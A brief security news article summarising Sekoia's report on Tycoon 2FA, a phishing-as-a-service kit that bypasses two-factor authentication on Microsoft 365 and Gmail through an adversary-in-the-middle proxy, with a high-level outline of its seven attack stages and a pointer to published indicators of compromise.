In the ever-evolving landscape of cyber threats, a new adversary has emerged: Tycoon 2FA. This phishing-as-a-service (PhaaS) platform has been making waves by targeting Microsoft 365 and Gmail accounts while bypassing two-factor authentication (2FA) protection.

Discovered by Sekoia analysts in October 2023 during routine threat hunting, Tycoon 2FA has been active since at least August 2023. Initially offered through private Telegram channels by the Saad Tycoon group, it has quickly gained traction in the cybercriminal community.

This sophisticated PhaaS kit, similar to other adversary-in-the-middle (AitM) platforms, employs a multi-step process to execute attacks with stealth and efficiency. By utilizing a reverse proxy server hosting phishing web pages, Tycoon 2FA intercepts victims’ inputs and relays them to legitimate services, thereby stealing session cookies and bypassing MFA mechanisms.

Sekoia’s report outlines seven distinct stages of Tycoon 2FA attacks:

1. Distribution of malicious links via email or QR codes.
2. Filtering out bots with a security challenge.
3. Extraction of victim email and customization of the attack.
4. Redirection to a fake login page.
5. Presentation of a fake Microsoft login page to steal credentials.
6. Mimicking a 2FA challenge to intercept tokens and bypass security.
7. Redirection to a legitimate-looking page to obscure the phishing attack’s success.

The latest version of Tycoon 2FA, released in 2024, boasts significant modifications to enhance phishing and evasion capabilities. Updates to JavaScript and HTML code, along with improved resource retrieval and filtering mechanisms, contribute to its sophistication.

Despite its relatively recent emergence, Tycoon 2FA has already amassed a substantial user base of cybercriminals. Evidence suggests widespread utilization for phishing operations, with over 1,800 transactions recorded in the associated Bitcoin wallet since October 2019, totaling over $394,015 worth of cryptocurrency.

In a landscape teeming with PhaaS options, Tycoon 2FA stands out for its effectiveness in bypassing 2FA protections. As cyber threats continue to evolve, vigilance and proactive measures are essential to safeguard against such sophisticated attacks.

For organizations and individuals seeking to protect themselves, awareness of indicators of compromise (IoCs) linked to Tycoon 2FA operations can serve as a valuable defense mechanism. Sekoia provides a repository with over 50 IoCs to aid in detection and mitigation efforts.

Read the original post here.